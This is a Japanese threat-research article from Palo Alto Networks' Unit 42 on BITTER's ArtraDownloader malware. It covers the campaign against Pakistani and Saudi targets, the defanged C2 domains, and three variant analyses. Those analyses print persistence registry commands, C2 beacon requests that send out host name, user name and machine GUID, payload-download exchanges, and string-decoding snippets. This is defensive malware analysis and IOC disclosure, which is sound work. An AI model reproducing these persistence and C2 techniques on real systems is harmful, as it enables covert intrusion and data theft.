[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# BITTER: 複数のArtraDownloaderの亜種を使う攻撃、パキスタンが標的に

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Josh Grunzweig](https://unit42.paloaltonetworks.com/ja/author/josh-grunzweig/)
  * [Brittany Barbehenn](https://unit42.paloaltonetworks.com/ja/author/brittany-barbehenn/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2019年2月25日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [サイバー犯罪](https://unit42.paloaltonetworks.com/ja/category/cybercrime-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Artradownloader](https://unit42.paloaltonetworks.com/ja/tag/artradownloader-ja/)
  * [Bitter](https://unit42.paloaltonetworks.com/ja/tag/bitter-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/?pdf=download&lg=ja&_wpnonce=7c3dfffa8c "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/?pdf=print&lg=ja&_wpnonce=7c3dfffa8c "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=BITTER:%20複数のArtraDownloaderの亜種を使う攻撃、パキスタンが標的に&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F&title=BITTER:%20複数のArtraDownloaderの亜種を使う攻撃、パキスタンが標的に "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F&text=BITTER:%20複数のArtraDownloaderの亜種を使う攻撃、パキスタンが標的に "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=BITTER:%20複数のArtraDownloaderの亜種を使う攻撃、パキスタンが標的に%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fmultiple-artradownloader-variants-used-by-bitter-to-target-pakistan%2F "Share in Mastodon")

## 概要

少なくとも2015年以来、 [おそらくは南アジアを拠点としている脅威攻撃グループ](https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/)BITTERは、これまで報告されていないダウンローダの亜種を使用してパキスタンと中国の組織を標的にしています。パロアルトネットワークス脅威インテリジェンス調査チームUnit 42はこのマルウェアファミリを、サンプル内で発見されたPDB文字列に基づいてArtraDownloaderと命名しました。このダウンローダーについては3つの亜種を確認しており、最初期のタイムスタンプは2015年2月のものでした。このダウンローダーが遠隔アクセス用トロイの木馬(RAT)BitterRATを頻回ダウンロードする様子を確認していますが、BitterRATは[BITTER](https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan)脅威攻撃グループの活動に関連しているものです。

あるある2018年9月の開始以降2019年初頭にかけてBITTERはパキスタンとサウジアラビアを標的に継続的な波状攻撃を仕掛けています。これはサウジアラビアをターゲットにしたBITTERの最初の報告例です。これらの攻撃と、観測された3つのArtraDownloaderの亜種に関する詳細は、以下のとおりです。

## 活動内容

2018年9月中旬から2019年1月にかけて Unit 42は、パキスタンとサウジアラビアの組織を標的としてArtraDownloaderが使われた様子を観測しました。関連して悪意のあるドキュメントが複数特定されていますが、これらはすべて、侵害された可能性の高い正規のパキスタンのWebサイトと通信し、ペイロードを取得していました。これらのウェブサイトには、パキスタン政府そのほかのパキスタン関連組織が含まれていました。

2018年9月12日以降、https://wforc\[.\]pk/js/ のURLでホストされている以下の名前のファイルを確認しました。

* Internet Data Traffic Report -- August 2018.docx
* PAF Webmail Security Report.doc.exe

おそらくはスピアーフィッシングで、サウジアラビアのある電力会社の従業員を狙ったものと思われます。この悪意のあるファイルはC2先としてnethosttalk\[.\]comと通信していました。

同じ時期に、パキスタンの別のWebサイトで2つの追加ファイル(下記にリスト)がホストされている様子が観測されました。これらの実行ファイルは、以下の名前で khurram.com\[.\]pk/js/drvn というURL上にホストされており、C2のドメインnethosttalk\[.\]comと通信していました。

* Handling of Logistics.pdf\[.\]com
* Cyber security work shop.pdf\[.\]com

2018年11月6日からhttp://rmmun.org\[.\]pk/svch というURLが、ドメインinfo.viewworld71\[.\]comまたはhewle.kielsoservice\[.\]netと通信する2つのArtraDownloaderファイルをホストしていることが確認されました。なおRMMUN (Roots Metropolitan Model United Nations)というのは、2018年11月8日〜11日に開催された組織的イベントで、人権問題や経済発展問題などでの協力や洞察を促進することを目的としているものです。

2018年11月から2019年1月にかけ、パキスタンのエンジニアリング・油圧関連会社almasoodgroup\[.\]comは、2つのAtraDownloader実行可能ファイルとペイロードを配信するために使用される悪意のあるドキュメントをホストしていました。そのファイルの1つ、Port Details.docは、EQNEDTの脆弱性[CVE-2017-11882](https://nvd.nist.gov/vuln/detail/CVE-2017-11882)を悪用するように細工されたRTF文書です。このRTF文書がペイロードをダウンロードしますが、このさいもドメインhewle.kielsoservice\[.\]netと通信していました。エンジニアリング会社のドメインでホストされているほかの2つのファイルは、C2ドメインxiovo426\[.\]netと通信していました。

1月19日にarticle\_amy.docというファイルもVirusTotalにアップロードされました。このドキュメントはalmasoodgroup\[.\]com/js/cwqjにホストされ、C2ドメインthepandaservices.nsiagenthoster\[.\]netと通信していました。この例でドメインalmasoodgroup\[.\]comは、侵害された正規のサイトのように見えます。

2018年12月17日と18日には、一人のユーザーがcocktail and the dinner in the last week of dec.docという文書にアクセスした後、あるファイルがhttp://fst.gov\[.\]pk/images/winsvc（SHA256: ef0cb0a1...）からダウンロードされていました。このユーザーがどのようにしてこのドキュメントを実行するように誘導されたかは不明です。このペイロードは、CVE-2017-11882(EQNEDT)を悪用するArtraDownloaderの亜種1です。この例でこのインスタンスはhewle.kielsoservice\[.\]net/Engset.phpのC2ドメインを使用している様子が観測されました。

### 亜種の比較

合計で、ArtraDownloaderマルウェアファミリに属するおよそ80個のユニークなインスタンスが発見されています。これらのサンプルには、はっきりと異なる亜種が3種類確認されています。こうした亜種間の相違は、とくにそれが文字列の難読化やHTTPリクエストに関連したものであれば、一般に小さなものになる傾向があります。

ArtraDownloaderに属していることが確認された最も初期のサンプルのコンパイルタイムスタンプは2015年2月でした。ここから、このマルウェアファミリが作られてからおおよそどのくらい経過しているかが分かります。

今のところUnit 42は、このマルウェアファミリが、BITTERに関連するRATマルウェアファミリのインスタンスをダウンロード・実行する様子のみを確認しています。識別された各サンプルがコンパイルされた時期に関する内訳は、次のとおりです。
![図1 コンパイルタイムスタンプに基づくArtraDownloader亜種のタイムライン](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/11/word-image-4-1024x256.jpeg) 図1 コンパイルタイムスタンプに基づくArtraDownloader亜種のタイムライン

全体的に見て、ArtraDownloaderマルウェアファミリーは洗練されたものではなく、永続化のための単純なレジストリキーと、リモートファイルをダウンロードして実行するためのHTTPリクエストを利用します。これらのサンプル内の重要な文字列は、文字列内の各バイトから加算または減算することによって難読化されます。HTTPを介してデータを送信するときにも、この同じ難読化ルーチンが使用されます。

興味深いことに、今回の分析中、以前分析したペイロード内で見たインフラストラクチャが重複使用されている様子を確認しました。[2017年11月](https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/)に私たちはある悪質な文書について報告したことがありますが、この文書はドメインzmwardrobe\[.\]comからダウンロードされ、その後MY24と呼ばれるペイロードを実行するものでした。この活動は2017年9月から10月にかけて観測されました。2017年11月に、ArtraDownloaderが同じドメインに対してクエリを実行するのを初めて確認しました。これは2018年2月まで続きました。両方のペイロードともにInPageのエクスプロイトで観測されました。

発見された亜種とそれぞれの詳細な分析の詳細については、後述の付録を参照してください。

## 結論

一般的にBITTERと呼ばれている脅威攻撃グループは、本稿執筆時点まで世界中のさまざまな地域に対して継続的に活動中です。彼らはArtraDownloaderという名前のカスタマイズされたダウンローダマルウェアファミリを使用し、パキスタン、中国、サウジアラビアを標的にしていることが確認されています。このダウンローダーは、独自のカスタム難読化ルーチンを利用し、HTTP経由でBitterRATマルウェアファミリーをダウンロード・実行します。

パキスタン政府、エンジニアリング会社、電力会社などの複数の組織が、侵害の影響を受けたか、BITTERが使用するマルウェアをホストしていたことが判明しています。私たちは今後もこの攻撃グループの監視を継続します。パロアルトネットワークスのお客様は、次の方法でこの脅威から保護されています。

* すべてのマルウェアは、WildFireで悪意のあるものとして適切に分類されます
* マルウェアの通信に使用されているドメインおよびマルウェアをホストしているURLは「Malicious(悪意のある)」というフラグが付けられます
* AutoFocusをお使いのお客様は、BITTER、BITTERRAT、ArtraDownloaderタグを利用してこの脅威を継続的に追跡できます

## 付録

### ArtraDownloaderマルウェア解析 - 亜種1

この分析の残りの部分では、次のファイルを使用します。

|------------------|------------------------------------------------------------------|
| **MD5**          | 7cc0b212d1b8ceb808c250495d83bae4                                 |
| **SHA1**         | d2c161ce52240b61d632607a2262890327d82502                         |
| **SHA256**       | ef0cb0a1a29bcdf2b36622f72734aec8d38326fc8f7270f78bd956e706a5fd57 |
| **コンパイルタイムスタンプ** | 2018-12-06 11:14:45 UTC                                          |

表1 ArtraDownloader亜種1のサンプル

実行すると、このサンプルは次のプロパティを持つ新しいWindowクラスを作成して登録します。

Window Name: seal  
Class Name: SEAL

この新しく作成されたWindowクラスでWM\_CREATEメッセージを受信すると、SetTimer()呼び出しを介して20秒後に新しい関数が実行されます。この関数は、実際にリモートペイロードをダウンロードして実行する役割を果たし、マルウェアの実行が終了した段階ではじめて呼び出されます。

ArtraDownloaderは、つづいて被害者のPCから以下の情報を収集します。

* コンピュータ名
* オペレーティングシステム
* ユーザー名

マルウェア実行は全過程にわたり、検出避けのためにさまざまな文字列がエンコードされています。これらの文字列をデコードするために次のPythonコードを利用できます。  
def decode(data): out = "" for d in data: out += chr(ord(d)-1) return out

|-----------|---------------------------------------------------------------------------|
| 1 2 3 4 5 | def decode(data): out = "" for d in data: out += chr(ord(d)-1) return out |

例:

\>\> print(decode("ifxmf/ljfmtptfswjdf/ofu"))  
\>\> hewle.kielsoservice\[.\]net

この後は次のフォルダパスを取得しようとします。最初に正しく識別されたフォルダが使用されます。

* TEMPLATES
* NETHOOD
* APPDATA

ctfmon.exeファイルがこのパスに追加されます。まだ存在しない場合、このパスにArtraDownloader自体もコピーされます。

その後、このマルウェアは次のフォルダパスを取得しようとします。最初に正しく識別されたフォルダが使用されます。

* NETHOOD
* TEMPLATES
* APPDATA

perfcファイルがこのパスに追加されます。このパスはマルウェアがリモートファイルをダウンロードするときの一時的な保存先として使用されます。

ダウンローダは、HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuidレジストリキーを介して被害者のマシンのGUIDを識別します。このキーが正常にクエリされた場合は、次のデータを含む文字列が整形されます。

\[Computer Name\]##\[Username\]@@\[Machine GUID\]

キーが正常にクエリされなかった場合は、次の文字列が生成されます。

\[Computer Name\]!@\[Username\]

この情報はこの後に続くネットワークリクエストで使用されます。永続性を維持にするため、マルウェアはホストのレジストリを変更します。次の2つのキーが設定されます。

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\JITDfbug -- "cmd /c start %Qrp% \&\& exit"  
HKCU\\Environment\\Qrp -- \[path\]\\ctfmon.exe

ここで\[path\]は、ArtraDownloaderが自分自身のコピー先として選択したパスです。これら2つのレジストリキー変更で、被害者のPCは起動のたびにマルウェアを実行するようになります。

マルウェア実行フローのこの時点で、先に説明した20秒タイマーで実行される関数が最終的に実行されます。この関数は、リモートC2サーバに対し、次の例に示すPOSTリクエストを生成するところから活動を始めます。

POST /Engset.php HTTP/1.0  
Host: hewle.kielsoservice\[.\]net  
Connection: keep-alive  
Content-type: application/x-www-form-urlencoded  
Content-length: 148

BCDEF=XJO.82GO2QF2BU9\&MNOPQ=Xjoepxt!8!Vmujnbuf\&GHIJ=Kpti!Hsvo{xfjh\&UVWXYZ=XJO.82GO2QF2BU9$$Kpti!Hsvo{xfjhAA214cf8g5.cgc9.51gb.914d.f17ceg:e4cc7\&st=0

このリクエストのPOSTデータは、前述の文字列に対して行われていたエンコード方法と同じ手法でエンコードされます。このデータをデコードすると以下のようになります。

|------------|------------------------------------|-----------------------------------------------------------------------|
| **POST変数** | **説明**                             | **デコードした場合のサンプル**                                                     |
| BCDEF      | ホスト名                               | WIN-71FN1PE1AT8                                                       |
| MNOPQ      | Microsoft Windows バージョン            | Windows 7 Ultimate                                                    |
| GHIJ       | ユーザー名                              | Josh Grunzweig                                                        |
| UVWXYZ     | 作成しておいた文字列。これを使って被害者を一意に識別する       | WIN-71FN1PE1AT8##Josh Grunzweig@@103be7f4-bfb8-40fa-803c-e06bdf9d3bb6 |
| st         | 以前ダウンロードしたファイルが正常に実行されたかどうかを示すブール値 | 0                                                                     |

表2 ArtraDownloader亜種1のデコードされたPOSTリクエスト

期待されるレスポンスは次のとおりです。ここで「qbzmpbe」は、ダウンロード後実行されるサンプルをエンコードした実行可能ファイル名(デコードされた後は「payload」)です。

DFCB=DWN qbzmpbe\<br\>

期待していたレスポンスがリモートC2サーバーから返されれば、ArtraDownloaderは続くPOSTリクエストを行います。

上記のリクエスト例では、前のリクエストのUZWXYZ POST変数で確認したものと同じ一意の識別子を使用しています。

リモートC2サーバーは、レスポンスが次の形式であることを期待しています。

exe\[hex-encoded data\]\&lt

ここで\[hex-encoded data\]は16進エンコードされたペイロードのバイナリです。次の例で示すように、モック用のC2サーバーからレスポンスはrawのままperfcファイルに書き込まれます。

HTTP/1.0 200 OK  
Content-Type: text/html; charset=utf-8  
Content-Length: 28  
Server: Werkzeug/0.12.2 Python/2.7.15  
Date: Tue, 08 Jan 2019 18:46:23 GMT

exe68656c6c6f20776f726c64\&lt

このファイルが書き込まれた後、マルウェアは16進エンコードされたデータをデコードし、perfcと同じパスにある以前に定義されたファイル名にこれを書き込みます。先ほどの例では、ペイロードはファイル名として提供されていたので、この特定のペイロードはpayload.exeに書き込まれます。モック用サーバからの例を使用すると、このファイルには「hello world」という文字列が含まれることになります。

この段階で、マルウェアはShellExecuteA()呼び出しを介して新しいプロセスでこの新しく作成された実行ファイルを開きます。これが成功すると、ArtraDownloaderは同じPOSTパラメータで/Engset.phpへのその後のHTTPリクエストを行います。ただし、この要求では、POST変数stが1に設定されます。

### ArtraDownloaderマルウェア解析 - 亜種2

この分析の残りの部分では、次のファイルを使用します。

|------------------|----------------------------------------------------------------------------------------------|
| **MD5**          | 8d42c01180be7588a2a68ad96dd0cf85                                                             |
| **SHA1**         | 89a7861acb7983ad712ae9206131c96454a1b3d8                                                     |
| **SHA256**       | 0b2a794bac4bf650b6ba537137504162520b67266449be979679afbb14e8e5c0                             |
| **コンパイルタイムスタンプ** | 2019-01-07 07:13:47 UTC                                                                      |
| **PDB文字列**       | c:\\Users\\Asterix\\Documents\\Visual Studio 2008\\Projects\\28NovDwn\\Release\\28NovDwn.pdb |

表3 ArtraDownloader亜種2のサンプル

実行すると、このサンプルは次のプロパティを持つ新しいWindowクラスを作成して登録します。

Window Name: 28NovDwn  
Class Name: MY28NOVDWN

このマルウェアは、シンプルなルーチンで一連の文字列を解読します。この一連の文字列をデコードするのに、次のPythonコードを利用できます。  
def decode(data): out = "" for d in data: out += chr((ord(d)-3)\&amp;0xFF) return out

|-----------|---------------------------------------------------------------------------------------|
| 1 2 3 4 5 | def decode(data): out = "" for d in data: out += chr((ord(d)-3)\&amp;0xFF) return out |

\>\> print(decode("iudphzrunvxssruw1qhw"))  
\>\> frameworksupport\[.\]net

この後はC:\\intel\\ディレクトリを作成しようとしますが、最終的にはここにさまざまなファイルが保存されることになります。被害者のPC上での永続性を維持するため、まだ存在しない場合は次のレジストリを作成します。

HKCU\\Environment\\AppId -- c:\\intel\\msdtcv.exe

その後、ArtraDownloaderは次のレジストリキーを設定して、再起動後にマルウェアが実行されるようにします。

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -- cmd /c start %AppId% \&\& exit

さらに、別のスレッドで、このマルウェアは新しいプロセスを生成し、自分自身をC:\\intel\\msdtcv.exeというパスにコピーします。  
オペレーティングシステム、マシンのGUID、ホスト名に関する情報を含む、被害者のPCに関するさまざまな情報が収集されます。この情報は、最終的には被害者特定と感染ホストに関する一般情報提供の両方に使用されます。

次の例のようなGETリクエストがリモートC2サーバーに対して行われます。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_01.png)

上記のリクエストの例では、GET変数TIeが提供するデータは「\*」で区切られ、残りのデータは各バイトに1を加えることによってエンコードされています。この文字列をデコードすると、次のようになります。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_02.png)

上記のデータには、コンピュータのGUID、被害者のホスト名、およびオペレーティングシステムに関する情報が含まれています。次のC2レスポンスが示すように、この特定のGETリクエストではAXE: 識別子を探しています。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_03.png)

このレスポンスでは「#」の間のデータがパースされ、その後に続くリクエストが行われます。この情報がレスポンスに含まれている場合、マルウェアはCSIDL\_HISTORYフォルダにクエリを出します。CSIDL\_HISTORYフォルダは、インターネット履歴項目の共通リポジトリとしての役割があるファイルシステムディレクトリです。このパスには文字列ZXが追加され、その後にHTTPレスポンスで使用されるファイル名が続きます。この例ではwscsplです。この例では次のようになります。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_04.png)

この新しく生成されたファイルパスに提供されるデータに対するHTTPリクエストは次のとおりです。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_05.png)

HTTPレスポンス全体が前述のファイルパスに書き込まれます。ArtraDownloaderは、次にこのHTTPレスポンス全体のPOSTデータをパースし、オフセット0x1からZXの文字を含まないファイルパスのすべてを.exe拡張子をつけて抽出します。前の例を使用すると、このファイルは次のようになります。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_06.png)

パスにZXを含む以前書き込まれたファイルは削除されます。最後に、このファイルが新しいプロセス内で実行されます。この実行ファイルがエラーなく生成されると、マルウェアは次の例のような最終HTTPリクエストを送信します。

![](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2019/02/sample02_07.png)

### ArtraDownloaderマルウェア解析 - 亜種3

この分析の残りの部分では、次のファイルを使用します。

|------------------|------------------------------------------------------------------|
| **MD5**          | a1bdb1889d960e424920e57366662a59                                 |
| **SHA1**         | 177837d0fa5bfd274abe79d80a01cfe2374b4cd9                         |
| **SHA256**       | f0ef4242cc6b8fa3728b61d2ce86ea934bd59f550de9167afbca0b0aaa3b2c22 |
| **コンパイルタイムスタンプ** | 2018-07-30 09:18:37 UTC                                          |
| **PDB文字列**       | d:\\C++\\new\_downloader\_aroundtheworld123\\Release\\audiodq.pdb  |

表4 ArtraDownloader亜種3のサンプル

実行されると、マルウェアはシンプルなデコードルーチンを介して一連の文字列をデコードすることから始めます。この一連の文字列をデコードするのに、次のPythonコードを利用できます。  
def decode(data): out = "" for d in data: out += chr((ord(d)-13)\&amp;0xFF) return out

|-----------|----------------------------------------------------------------------------------------|
| 1 2 3 4 5 | def decode(data): out = "" for d in data: out += chr((ord(d)-13)\&amp;0xFF) return out |

\>\> print(decode(binascii.unhexlify("6E7F7C827B71817572847C7F79713E3F403B7B7281")))

\>\> aroundtheworld123\[.\]net

このマルウェアはまずAVGのセキュリティ製品が現在システムで実行されているかどうかをチェックしていますが、ArtraDownloaderがこの情報を使用している様子は確認できません。マルウェア作成者が実行したテストのゴミが意図せずサンプル内に残っていた可能性があります。

システムに関するさまざまな情報がマルウェアによって収集され、その後のHTTPリクエストで使用されます。この情報を収集した後、次のようなHTTP GETリクエストが実行されます。

GET ///healthne/accept.php?a=WIN-71FN1PE1AT8\&b=WIN-71FN1PE1AT8\&c=Windows%207%20Ultimate\&d=Josh GrunzweigJosh Grunzweig103be7f4-bfb8-40fa-803c-e06bdf9d3bb6365536040965860\&e= HTTP/1.1  
Host: aroundtheworld123\[.\]net

このマルウェアファミリでこれまで見てきたほかの亜種とは違って、この特定の亜種はネットワークを介して送信するデータを難読化しません。このリクエストでは、次のGETパラメータが使用されます。

|-----------|----------------------------------------------------------------------------|
| **GET変数** | **説明**                                                                     |
| a         | ホスト名                                                                       |
| b         | コンピュータ名                                                                    |
| c         | オペレーティングシステムのバージョン                                                         |
| d         | 被害者のユーザー名、マシンのGUID、GetSystemInfo()呼び出しを介してクエリされたさまざまな情報の2つのインスタンスを含む一意の文字列 |
| e         | この特定のサンプル内では使用されていないように見える変数                                               |

表5 ArtraDownloader亜種3で観測されたGETパラメータ

このリクエストに対するレスポンスの例は以下の通りです。

HTTP/1.1 200 OK  
Content-Type: text/html; charset=UTF-8  
Content-Length: 29  
Date: Mon, 05 Nov 2018 19:22:56 GMT  
Accept-Ranges: bytes  
Server: LiteSpeed  
Connection: Keep-Alive

Yes file58368\[regdl\]35No file

このリクエストに対するレスポンスがパースされます。具体的には文字列Yesファイルを識別しようとしています。この文字列が存在する場合は、\[と\]の間のデータがパースされます。次に示すとおり、このデータは続くHTTPリクエストで使用され、リモートサーバーからファイルをダウンロードします。

GET /healthne/healthne/regdl HTTP/1.0  
Host: aroundtheworld123\[.\]net

HTTP/1.0 200 OK  
Last-Modified: Tue, 02 Oct 2018 04:38:28 GMT  
Content-Type: application/octet-stream  
Content-Length: 58368  
Date: Mon, 05 Nov 2018 19:23:01 GMT  
Accept-Ranges: bytes  
Server: LiteSpeed  
Connection: close

MZ......................\[TRUNCATED\]

この実行可能ファイルは、マルウェアと同じディレクトリに書き込まれ、提供されたものと同じ名前を使用します。たとえばこのマルウェアが最初にC:\\から実行された場合、ダウンロードされたファイルはC:\\regdl.exeに書き込まれます。最後に、この実行ファイルが新しいプロセス内で実行されます。

## IOC

関連するすべてのIOCを含むCSVファイルについては、次のリンクを参照してください。

[https://github.com/pan-unit42/iocs/tree/master/bitter](https://github.com/pan-unit42/iocs/tree/master/bitter)

トップに戻る

### タグ

* [Artradownloader](https://unit42.paloaltonetworks.com/ja/tag/artradownloader-ja/ "artradownloader")
* [Bitter](https://unit42.paloaltonetworks.com/ja/tag/bitter-ja/ "Bitter")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に](https://unit42.paloaltonetworks.com/ja/new-babyshark-malware-targets-u-s-national-security-think-tanks/ "北朝鮮による攻撃との関与が疑われる新しいマルウェアが、米国の国家安全保障シンクタンクを標的に")

### 目次

* 

### 関連記事

## 関連項目 リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
